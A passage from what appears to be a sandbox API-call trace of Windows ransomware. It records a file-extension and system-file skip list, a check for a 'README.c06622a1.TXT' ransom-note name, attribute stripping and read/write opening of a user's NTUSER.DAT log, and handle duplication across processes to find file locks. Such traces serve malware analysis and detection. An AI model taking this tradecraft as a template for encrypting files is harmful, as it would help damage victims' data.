(_String="mpa") returned 0x3 [0162.247] _wcsicmp (_Str1="msc", _Str2="LOG2") returned 1 [0162.247] wcslen (_String="msc") returned 0x3 [0162.247] _wcsicmp (_Str1="msp", _Str2="LOG2") returned 1 [0162.247] wcslen (_String="msp") returned 0x3 [0162.247] _wcsicmp (_Str1="msstyles", _Str2="LOG2") returned 1 [0162.247] wcslen (_String="msstyles") returned 0x8 [0162.247] _wcsicmp (_Str1="msu", _Str2="LOG2") returned 1 [0162.247] wcslen (_String="msu") returned 0x3 [0162.247] _wcsicmp (_Str1="nls", _Str2="LOG2") returned 2 [0162.247] wcslen (_String="nls") returned 0x3 [0162.247] _wcsicmp (_Str1="nomedia", _Str2="LOG2") returned 2 [0162.247] wcslen (_String="nomedia") returned 0x7 [0162.247] _wcsicmp (_Str1="ocx", _Str2="LOG2") returned 3 [0162.247] wcslen (_String="ocx") returned 0x3 [0162.247] _wcsicmp (_Str1="prf", _Str2="LOG2") returned 4 [0162.247] wcslen (_String="prf") returned 0x3 [0162.247] _wcsicmp (_Str1="ps1", _Str2="LOG2") returned 4 [0162.247] wcslen (_String="ps1") returned 0x3 [0162.247] _wcsicmp (_Str1="rom", _Str2="LOG2") returned 6 [0162.247] wcslen (_String="rom") returned 0x3 [0162.247] _wcsicmp (_Str1="rtp", _Str2="LOG2") returned 6 [0162.247] wcslen (_String="rtp") returned 0x3 [0162.247] _wcsicmp (_Str1="scr", _Str2="LOG2") returned 7 [0162.247] wcslen (_String="scr") returned 0x3 [0162.247] _wcsicmp (_Str1="shs", _Str2="LOG2") returned 7 [0162.247] wcslen (_String="shs") returned 0x3 [0162.247] _wcsicmp (_Str1="spl", _Str2="LOG2") returned 7 [0162.248] wcslen (_String="spl") returned 0x3 [0162.248] _wcsicmp (_Str1="sys", _Str2="LOG2") returned 7 [0162.248] wcslen (_String="sys") returned 0x3 [0162.248] _wcsicmp (_Str1="theme", _Str2="LOG2") returned 8 [0162.248] wcslen (_String="theme") returned 0x5 [0162.248] _wcsicmp (_Str1="themepack", _Str2="LOG2") returned 8 [0162.248] wcslen (_String="themepack") returned 0x9 [0162.248] _wcsicmp (_Str1="wpx", _Str2="LOG2") returned 11 [0162.248] wcslen (_String="wpx") returned 0x3 [0162.248] _wcsicmp (_Str1="lock", _Str2="LOG2") returned -4 [0162.248] wcslen (_String="lock") returned 0x4 [0162.248] _wcsicmp (_Str1="key", _Str2="LOG2") returned -1 [0162.248] wcslen (_String="key") returned 0x3 [0162.248] _wcsicmp (_Str1="hta", _Str2="LOG2") returned -4 [0162.248] wcslen (_String="hta") returned 0x3 [0162.248] _wcsicmp (_Str1="msi", _Str2="LOG2") returned 1 [0162.248] wcslen (_String="msi") returned 0x3 [0162.248] _wcsicmp (_Str1="pdb", _Str2="LOG2") returned 4 [0162.248] wcslen (_String="pdb") returned 0x3 [0162.248] _wcsicmp (_Str1="sqlite", _Str2="LOG2") returned 7 [0162.248] wcslen (_String="sqlite") returned 0x6 [0162.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0162.248] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0162.248] _wcsicmp (_Str1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", _Str2="README.c06622a1.TXT") returned -4 [0162.248] wcsstr (_Str="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", _SubStr="README") returned 0x0 [0162.248] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.248] wcslen (_String="autorun.inf") returned 0xb [0162.248] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0162.248] wcslen (_String="boot.ini") returned 0x8 [0162.249] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0162.249] wcslen (_String="bootfont.bin") returned 0xc [0162.249] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0162.249] wcslen (_String="bootsect.bak") returned 0xc [0162.249] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0162.249] wcslen (_String="desktop.ini") returned 0xb [0162.249] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.249] wcslen (_String="iconcache.db") returned 0xc [0162.249] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.249] wcslen (_String="ntldr") returned 0x5 [0162.249] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -123 [0162.249] wcslen (_String="ntuser.dat") returned 0xa [0162.249] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -77 [0162.249] wcslen (_String="ntuser.dat.log") returned 0xe [0162.249] _wcsicmp (_Str1="ntuser.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.249] wcslen (_String="ntuser.ini") returned 0xa [0162.249] _wcsicmp (_Str1="thumbs.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.249] wcslen (_String="thumbs.db") returned 0x9 [0162.249] _wcsicmp (_Str1="386", _Str2="blf") returned -47 [0162.249] wcslen (_String="386") returned 0x3 [0162.249] _wcsicmp (_Str1="adv", _Str2="blf") returned -1 [0162.249] wcslen (_String="adv") returned 0x3 [0162.249] _wcsicmp (_Str1="ani", _Str2="blf") returned -1 [0162.249] wcslen (_String="ani") returned 0x3 [0162.249] _wcsicmp (_Str1="bat", _Str2="blf") returned -11 [0162.249] wcslen (_String="bat") returned 0x3 [0162.249] _wcsicmp (_Str1="bin", _Str2="blf") returned -3 [0162.249] wcslen (_String="bin") returned 0x3 [0162.249] _wcsicmp (_Str1="cab", _Str2="blf") returned 1 [0162.249] wcslen (_String="cab") returned 0x3 [0162.249] _wcsicmp (_Str1="cmd", _Str2="blf") returned 1 [0162.249] wcslen (_String="cmd") returned 0x3 [0162.249] _wcsicmp (_Str1="com", _Str2="blf") returned 1 [0162.249] wcslen (_String="com") returned 0x3 [0162.249] _wcsicmp (_Str1="cpl", _Str2="blf") returned 1 [0162.249] wcslen (_String="cpl") returned 0x3 [0162.250] _wcsicmp (_Str1="cur", _Str2="blf") returned 1 [0162.250] wcslen (_String="cur") returned 0x3 [0162.250] _wcsicmp (_Str1="deskthemepack", _Str2="blf") returned 2 [0162.250] wcslen (_String="deskthemepack") returned 0xd [0162.250] _wcsicmp (_Str1="diagcab", _Str2="blf") returned 2 [0162.250] wcslen (_String="diagcab") returned 0x7 [0162.250] _wcsicmp (_Str1="diagcfg", _Str2="blf") returned 2 [0162.250] wcslen (_String="diagcfg") returned 0x7 [0162.250] _wcsicmp (_Str1="diagpkg", _Str2="blf") returned 2 [0162.250] wcslen (_String="diagpkg") returned 0x7 [0162.250] _wcsicmp (_Str1="dll", _Str2="blf") returned 2 [0162.250] wcslen (_String="dll") returned 0x3 [0162.250] _wcsicmp (_Str1="drv", _Str2="blf") returned 2 [0162.250] wcslen (_String="drv") returned 0x3 [0162.250] _wcsicmp (_Str1="exe", _Str2="blf") returned 3 [0162.250] wcslen (_String="exe") returned 0x3 [0162.250] _wcsicmp (_Str1="hlp", _Str2="blf") returned 6 [0162.250] wcslen (_String="hlp") returned 0x3 [0162.250] _wcsicmp (_Str1="icl", _Str2="blf") returned 7 [0162.250] wcslen (_String="icl") returned 0x3 [0162.250] _wcsicmp (_Str1="icns", _Str2="blf") returned 7 [0162.250] wcslen (_String="icns") returned 0x4 [0162.250] _wcsicmp (_Str1="ico", _Str2="blf") returned 7 [0162.250] wcslen (_String="ico") returned 0x3 [0162.250] _wcsicmp (_Str1="ics", _Str2="blf") returned 7 [0162.250] wcslen (_String="ics") returned 0x3 [0162.250] _wcsicmp (_Str1="idx", _Str2="blf") returned 7 [0162.250] wcslen (_String="idx") returned 0x3 [0162.250] _wcsicmp (_Str1="ldf", _Str2="blf") returned 10 [0162.250] wcslen (_String="ldf") returned 0x3 [0162.250] _wcsicmp (_Str1="lnk", _Str2="blf") returned 10 [0162.250] wcslen (_String="lnk") returned 0x3 [0162.250] _wcsicmp (_Str1="mod", _Str2="blf") returned 11 [0162.250] wcslen (_String="mod") returned 0x3 [0162.250] _wcsicmp (_Str1="mpa", _Str2="blf") returned 11 [0162.250] wcslen (_String="mpa") returned 0x3 [0162.250] _wcsicmp (_Str1="msc", _Str2="blf") returned 11 [0162.251] wcslen (_String="msc") returned 0x3 [0162.251] _wcsicmp (_Str1="msp", _Str2="blf") returned 11 [0162.251] wcslen (_String="msp") returned 0x3 [0162.251] _wcsicmp (_Str1="msstyles", _Str2="blf") returned 11 [0162.251] wcslen (_String="msstyles") returned 0x8 [0162.251] _wcsicmp (_Str1="msu", _Str2="blf") returned 11 [0162.251] wcslen (_String="msu") returned 0x3 [0162.251] _wcsicmp (_Str1="nls", _Str2="blf") returned 12 [0162.251] wcslen (_String="nls") returned 0x3 [0162.251] _wcsicmp (_Str1="nomedia", _Str2="blf") returned 12 [0162.251] wcslen (_String="nomedia") returned 0x7 [0162.251] _wcsicmp (_Str1="ocx", _Str2="blf") returned 13 [0162.251] wcslen (_String="ocx") returned 0x3 [0162.251] _wcsicmp (_Str1="prf", _Str2="blf") returned 14 [0162.251] wcslen (_String="prf") returned 0x3 [0162.251] _wcsicmp (_Str1="ps1", _Str2="blf") returned 14 [0162.251] wcslen (_String="ps1") returned 0x3 [0162.251] _wcsicmp (_Str1="rom", _Str2="blf") returned 16 [0162.251] wcslen (_String="rom") returned 0x3 [0162.251] _wcsicmp (_Str1="rtp", _Str2="blf") returned 16 [0162.251] wcslen (_String="rtp") returned 0x3 [0162.251] _wcsicmp (_Str1="scr", _Str2="blf") returned 17 [0162.251] wcslen (_String="scr") returned 0x3 [0162.251] _wcsicmp (_Str1="shs", _Str2="blf") returned 17 [0162.251] wcslen (_String="shs") returned 0x3 [0162.251] _wcsicmp (_Str1="spl", _Str2="blf") returned 17 [0162.251] wcslen (_String="spl") returned 0x3 [0162.251] _wcsicmp (_Str1="sys", _Str2="blf") returned 17 [0162.251] wcslen (_String="sys") returned 0x3 [0162.251] _wcsicmp (_Str1="theme", _Str2="blf") returned 18 [0162.251] wcslen (_String="theme") returned 0x5 [0162.251] _wcsicmp (_Str1="themepack", _Str2="blf") returned 18 [0162.251] wcslen (_String="themepack") returned 0x9 [0162.251] _wcsicmp (_Str1="wpx", _Str2="blf") returned 21 [0162.251] wcslen (_String="wpx") returned 0x3 [0162.251] _wcsicmp (_Str1="lock", _Str2="blf") returned 10 [0162.251] wcslen (_String="lock") returned 0x4 [0162.252] _wcsicmp (_Str1="key", _Str2="blf") returned 9 [0162.252] wcslen (_String="key") returned 0x3 [0162.252] _wcsicmp (_Str1="hta", _Str2="blf") returned 6 [0162.252] wcslen (_String="hta") returned 0x3 [0162.252] _wcsicmp (_Str1="msi", _Str2="blf") returned 11 [0162.252] wcslen (_String="msi") returned 0x3 [0162.252] _wcsicmp (_Str1="pdb", _Str2="blf") returned 14 [0162.252] wcslen (_String="pdb") returned 0x3 [0162.252] _wcsicmp (_Str1="sqlite", _Str2="blf") returned 17 [0162.252] wcslen (_String="sqlite") returned 0x6 [0162.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0162.252] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0162.252] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0162.252] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0162.252] wcscpy (in: _Dest=0x1f8e5c, _Source="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: _Dest="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0162.252] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 1 [0162.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.253] GetCurrentProcessId () returned 0xb58 [0162.253] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0162.253] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x1e3008 [0162.253] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x1e3008, Length=0x400, ResultLength=0x32ee30 | out: SystemInformation=0x1e3008, ResultLength=0x32ee30*=0x27624) returned 0xc0000004 [0162.253] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x1e3008, Size=0x27624) returned 0x3210048 [0162.253] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x27624, ResultLength=0x32ee30 | out: SystemInformation=0x3210048, ResultLength=0x32ee30*=0x27624) returned 0x0 [0162.257] GetCurrentProcessId () returned 0xb58 [0162.257] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0162.257] CloseHandle (hObject=0x1e8) returned 1 [0162.257] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x208e38 [0162.257] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x208e38, Length=0x400, ResultLength=0x32ee70 | out: SystemInformation=0x208e38, ResultLength=0x32ee70*=0x27614) returned 0xc0000004 [0162.257] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x208e38, Size=0x27614) returned 0x3210048 [0162.258] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x27614, ResultLength=0x32ee70 | out: SystemInformation=0x3210048, ResultLength=0x32ee70*=0x27614) returned 0x0 [0162.260] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x10000) returned 0x210e20 [0162.260] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.260] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.262] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.262] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.262] CloseHandle (hObject=0x1e4) returned 1 [0162.263] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.263] CloseHandle (hObject=0x194) returned 1 [0162.263] CloseHandle (hObject=0x1e8) returned 1 [0162.263] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.263] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.264] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.264] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.265] CloseHandle (hObject=0x1e4) returned 1 [0162.265] CloseHandle (hObject=0x194) returned 1 [0162.265] CloseHandle (hObject=0x1e8) returned 1 [0162.265] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.265] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.266] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.266] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.266] CloseHandle (hObject=0x1e4) returned 1 [0162.266] CloseHandle (hObject=0x194) returned 1 [0162.267] CloseHandle (hObject=0x1e8) returned 1 [0162.267] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.267] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.268] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.268] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.269] CloseHandle (hObject=0x1e4) returned 1 [0162.269] CloseHandle (hObject=0x194) returned 1 [0162.269] CloseHandle (hObject=0x1e8) returned 1 [0162.269] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.269] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.270] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.271] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.271] CloseHandle (hObject=0x1e4) returned 1 [0162.271] CloseHandle (hObject=0x194) returned 1 [0162.271] CloseHandle (hObject=0x1e8) returned 1 [0162.271] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.271] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.271] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.272] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.273] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.273] CloseHandle (hObject=0x1e4) returned 1 [0162.273] CloseHandle (hObject=0x194) returned 1 [0162.273] CloseHandle (hObject=0x1e8) returned 1 [0162.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.273] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.274] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.275] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.275] CloseHandle (hObject=0x1e4) returned 1 [0162.275] CloseHandle (hObject=0x194) returned 1 [0162.275] CloseHandle (hObject=0x1e8) returned 1 [0162.275] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.275] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.276] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.276] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.277] CloseHandle (hObject=0x1e4) returned 1 [0162.277] CloseHandle (hObject=0x194) returned 1 [0162.277] CloseHandle (hObject=0x1e8) returned 1 [0162.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0162.277] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.278] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.278] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.278] CloseHandle (hObject=0x1e4) returned 1 [0162.278] CloseHandle (hObject=0x194) returned 1 [0162.279] CloseHandle (hObject=0x1e8) returned 1 [0162.279] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0162.279] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.280] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.280] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.281] CloseHandle (hObject=0x1e4) returned 1 [0162.281] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.281] CloseHandle (hObject=0x194) returned 1 [0162.281] CloseHandle (hObject=0x1e8) returned 1 [0162.281] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0162.281] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.282] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.283] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.283] CloseHandle (hObject=0x1e4) returned 1 [0162.283] CloseHandle (hObject=0x194) returned 1 [0162.283] CloseHandle (hObject=0x1e8) returned 1 [0162.283] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0162.283] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.284] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.284] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.284] CloseHandle (hObject=0x1e4) returned 1 [0162.285] _wcsicmp (_Str1="\\ntdll.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -17 [0162.285] CloseHandle (hObject=0x194) returned 1 [0162.285] CloseHandle (hObject=0x1e8) returned 1 [0162.285] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.285] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.285] WaitForSingleObject (hHandle=0x1e4, 